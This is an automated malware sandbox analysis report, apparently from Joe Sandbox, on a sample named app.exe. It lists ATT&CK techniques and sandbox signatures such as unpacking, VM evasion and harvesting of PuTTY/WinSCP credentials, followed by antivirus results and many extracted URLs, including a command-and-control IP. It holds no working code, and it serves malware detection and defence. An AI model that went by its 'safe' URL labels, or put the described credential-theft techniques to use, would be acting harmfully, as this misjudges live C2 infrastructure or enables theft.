Software Packing
NTDS461
Security Software Discovery
Distributed Component Object ModelInput Capture14
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets13
Virtualization/Sandbox Evasion
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
File Deletion
Cached Domain Credentials1
Process Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items13
Virtualization/Sandbox Evasion
DCSync1
Application Window Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
Process Injection
Proc Filesystem2
System Network Configuration Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Bootkit
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Behavior Graph ID: 1436386, Sample: app.exe, Startdate: 05/05/2024, Architecture: WINDOWS, Score: 100

Start
  • DNS/IP: api.ipify.org
  • Signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for submitted file; Machine Learning detection for sample; 2 other signatures
  • started: app.exe
    • dropped: C:\Users\user\AppData\Local\Temp\...\app.exe, PE32
    • Signatures: Detected unpacking (creates a PE file in dynamic memory); Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines); Contains functionality to infect the boot sector; Queries memory information (via WMI often done to detect virtual machines)
    • started: app.exe (second instance), conhost.exe
      • app.exe (second instance) DNS/IP: 144.208.127.230, 49789, 80, SHOCK-1US, United States; api.ipify.org 172.67.74.152, 443, 49788, CLOUDFLARENETUS, United States
      • Signatures: Multi AV Scanner detection for dropped file; Detected unpacking (creates a PE file in dynamic memory); Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); 7 other signatures
      • started: cmd.exe, conhost.exe
        • cmd.exe started: conhost.exe, timeout.exe

Source | Detection | Scanner | Label | Link
app.exe
  • 11%, ReversingLabs
  • 100%, Joe Sandbox ML
  • 11%, Virustotal, Browse

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe
  • 100%, Joe Sandbox ML
  • 11%, ReversingLabs
  • 11%, Virustotal, Browse
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://144.208.127.230/J
  • 0%, Avira URL Cloud, safe
  • 0%, Virustotal, Browse
http://144.208.127.230/v
  • 0%, Avira URL Cloud, safe
http://144.208.127.230:80/w
  • 0%, Avira URL Cloud, safe
  • 0%, Virustotal, Browse
http://144.208.127.230/
  • 0%, Avira URL Cloud, safe
  • 0%, Virustotal, Browse
http://144.208.127.230/z
  • 0%, Avira URL Cloud, safe
  • 0%, Virustotal, Browse
http://144.208.127.230
  • 0%, Avira URL Cloud, safe
  • 0%, Virustotal, Browse
http://144.208.127.230/B
  • 0%, Avira URL Cloud, safe
http://144.208.127.230/Y
  • 0%, Avira URL Cloud, safe
  • 0%, Virustotal, Browse
http://144.208.127.230/U
  • 0%, Avira URL Cloud, safe
https://ocsp.quovadisoffshore.com0
  • 0%, Avira URL Cloud, safe
http://144.208.127.230:80/
  • 0%, Avira URL Cloud, safe
  • 0%, Virustotal, Browse
http://144.208.127.230:80/-35b871f0a661
  • 0%, Avira URL Cloud, safe
http://144.208.127.230:80/L
  • 0%, Avira URL Cloud, safe
http://144.208.127.230/7
  • 0%, Avira URL Cloud, safe
  • 0%, Virustotal, Browse
https://POSTHTTP/1.1Content-Type:
  • 0%, Avira URL Cloud, safe
http://144.208.127.230/e&
  • 0%, Avira URL Cloud, safe
https://alldrivers4devices.net
  • 0%, Avira URL Cloud, safe
  • 1%, Virustotal, Browse
http://144.208.127.230:80/o
  • 0%, Avira URL Cloud, safe
http://144.208.127.230/~
  • 0%, Avira URL Cloud, safe
  • 0%, Virustotal, Browse
http://144.208.127.230:80/T
  • 0%, Avira URL Cloud, safe
  • 0%, Virustotal, Browse
http://www.quovadis.bm0
  • 0%, Avira URL Cloud, safe
http://144.208.127.230:80/-35b871f0a661ozi
  • 0%, Avira URL Cloud, safe
http://144.208.127.230:80/R
  • 0%, Avira URL Cloud, safe
http://144.208.127.230U
  • 0%, Avira URL Cloud, safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.ipify.org
  IP: 172.67.74.152
  Active: true
  Malicious: false
  Reputation: high

Name | Malicious | Antivirus Detection | Reputation
http://144.208.127.230/
  Malicious: true
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
  Reputation: unknown
https://api.ipify.org/
  Malicious: false
  Reputation: high
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab
  Source: app.exe, 00000003.00000003.3188734917.00000000058E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182590144.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, Web Data.3.dr
  Malicious: false
  Reputation: high
https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
  Source: app.exe, 00000003.00000003.3188734917.00000000058E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182590144.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, Web Data.3.dr
  Malicious: false
  Reputation: high
https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
  Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
https://duckduckgo.com/ac/?q=
  Source: Web Data.3.dr
  Malicious: false
  Reputation: high
https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download
  Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
https://windows-drivers-x04.blogspot.com
  Source: app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
https://www.autoitscript.com
  Source: app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_
  Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE
  Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8-_
  Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
https://support.google.com/chrome/?p=plugin_flash
  Source: app.exe, 00000003.00000003.3177221257.00000000055AC000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
https://consent.trustarc.com
  Source: app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
http://144.208.127.230/z
  Source: app.exe, 00000003.00000003.3246373817.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3177623712.0000000000956000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
  Reputation: unknown
http://144.208.127.230:80/w
  Source: app.exe, 00000003.00000003.3139260264.0000000005588000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3123698644.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3134624186.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3130432829.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132299964.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3125985144.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3128278501.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3139068962.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116136458.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3136784723.0000000005586000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
  Reputation: unknown
http://144.208.127.230/v
  Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  • Avira URL Cloud: safe
  Reputation: unknown
https://setup.office.com/SignIn?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8&redirectUri=https%3A%2F%2F
  Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
https://secure.eicar.org/eicar.com;9
  Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
https://www.google.com
  Source: app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3257419916.00000000055D6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3261882543.00000000055DC000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301
  Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
http://144.208.127.230/J
  Source: app.exe, 00000003.00000003.3112020011.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3123955917.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3121520475.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116384116.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3126108218.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3118889457.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114263668.0000000000956000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
  Reputation: unknown
https://www.eicar.org/download-anti-malware-testfile/:
  Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp
  Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
https://setup.office.com/Home/EligibileActModern?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoft
  Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
  Source: app.exe, 00000003.00000003.3188734917.00000000058E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182590144.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, Web Data.3.dr
  Malicious: false
  Reputation: high
https://office.com/setup
  Source: app.exe, 00000003.00000003.3182859527.00000000055F1000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
http://144.208.127.230/B
  Source: app.exe, 00000003.00000003.3112020011.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3123955917.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3107954475.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3121520475.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116384116.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3103448637.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3126108218.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3118889457.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114263668.0000000000956000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  • Avira URL Cloud: safe
  Reputation: unknown
https://setup.office.com/Home/EligibileActModern?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
  Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570
  Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
https://lh5.googleusercontent.com/p/AF1QipOvNh-L3TTVll_wDyQd66TEaShUCp3i0iabc8se=w92-h92-n-k-no
  Source: app.exe, 00000003.00000003.3242282826.00000000055C6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3242197510.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3246273895.00000000058E5000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
http://144.208.127.230
  Source: app.exe, 00000003.00000002.3294569055.00000000008CF000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
  Reputation: unknown
https://www.google.com/search?q=at
  Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
http://144.208.127.230/Y
  Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
  Reputation: unknown
https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292K
  Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
https://secure.eicar.org/eicar.com.txtD
  Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT
  Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
https://account.live.com/Abuse?mkt=EN-US&uiflavor=web&client_id=1E000040382627&id=293577&lmif=40&abr
  Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
https://lh5.googleusercontent.com/p/AF1QipPFr704HJkdqZ5xefxGs53Btx8SeAbaCnWxa6-y=w92-h92-n-k-no
  Source: app.exe, 00000003.00000003.3242282826.00000000055C6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3242197510.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3246273895.00000000058E5000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
http://144.208.127.230/U
  Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  • Avira URL Cloud: safe
  Reputation: unknown
https://ocsp.quovadisoffshore.com0
  Source: app.exe, 00000003.00000003.3093301962.000000000551F000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  • Avira URL Cloud: safe
  Reputation: unknown
https://setup.office.com/?ms.officeurl=setup
  Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
http://144.208.127.230:80/
  Source: app.exe, 00000003.00000003.3114168289.0000000005584000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
  Reputation: unknown
https://recoveringlib.blogspot.com
  Source: app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
http://144.208.127.230:80/-35b871f0a661
  Source: app.exe, 00000003.00000003.3105612570.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3107523130.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3101845651.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3111746106.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3103619876.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3109755043.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116136458.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114168289.0000000005584000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  • Avira URL Cloud: safe
  Reputation: unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
  Source: app.exe, 00000003.00000003.3188734917.00000000058E3000.00000004.00000020.00020000.00000000.sdmp, Web Data.3.dr
  Malicious: false
  Reputation: high
https://aka.office.com/office/url/setupMicrosoft
  Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoft
  Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
http://144.208.127.230:80/L
  Source: app.exe, 00000003.00000003.3130432829.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132299964.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132482295.000000000558B000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  • Avira URL Cloud: safe
  Reputation: unknown
https://secure.eicar.org/eicar.com
  Source: app.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
https://aka.office.com/office/url/setup
  Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3DsetupSign
  Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe
  Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
http://144.208.127.230/7
  Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
  Reputation: unknown
https://www.google.com/search?q=autoit
  Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
  Source: Web Data.3.dr
  Malicious: false
  Reputation: high
https://setup.office.com/?ms.officeurl=setupMicrosoft
  Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
https://POSTHTTP/1.1Content-Type:
  Source: app.exe, 00000003.00000002.3295913444.0000000002530000.00000040.00001000.00020000.00000000.sdmp
  Malicious: false
  • Avira URL Cloud: safe
  Reputation: low
http://144.208.127.230/e&
  Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  • Avira URL Cloud: safe
  Reputation: unknown
https://secure.eicar.org/eicar.com.txt/
  Source: app.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
https://www.google.com/search?q=eicar
  Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
https://secure.eicar.org/eicar.com/
  Source: app.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
https://login.windows.net/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-153795cf
  Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
https://www.office.com/setup
  Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3Dsetup2V
  Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
https://www.google.com/favicon.ico
  Source: app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
                                                                                                        https://alldrivers4devices.netapp.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • 1%, Virustotal, Browse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://login.microsoftonline.com/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://office.com/setupMicrosoftapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://support.google.com/chrome/?p=plugin_flashaertapp.exe, 00000003.00000003.3177221257.00000000055AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://ac.ecosia.org/autocomplete?q=app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.eicar.org/download-anti-malware-testfile/Downloadapp.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8.app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.office.com/setupMicrosoftapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Continue/app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://144.208.127.230:80/oapp.exe, 00000003.00000003.3130432829.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132299964.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3128278501.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132482295.000000000558B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://setup.office.com/SignIn?ctid=34c190b7-c610-402a-b0d1-920cecdfcf12&redirectUri=https%3A%2F%2Fapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://www.autoitscript.com/site/autoit/downloads/AutoItapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://144.208.127.230/~app.exe, 00000003.00000003.3112020011.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3123955917.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3121520475.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116384116.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3126108218.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3118889457.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114263668.0000000000956000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • 0%, Virustotal, Browse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://144.208.127.230:80/Tapp.exe, 00000003.00000003.3105612570.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3107523130.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3111746106.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3109755043.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116136458.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114168289.0000000005584000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • 0%, Virustotal, Browse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://www.quovadis.bm0app.exe, 00000003.00000003.3093301962.000000000551F000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://144.208.127.230:80/-35b871f0a661oziapp.exe, 00000003.00000003.3177623712.000000000090A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://144.208.127.230:80/Rapp.exe, 00000003.00000003.3177623712.000000000090A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQapp.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Continueapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoftapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
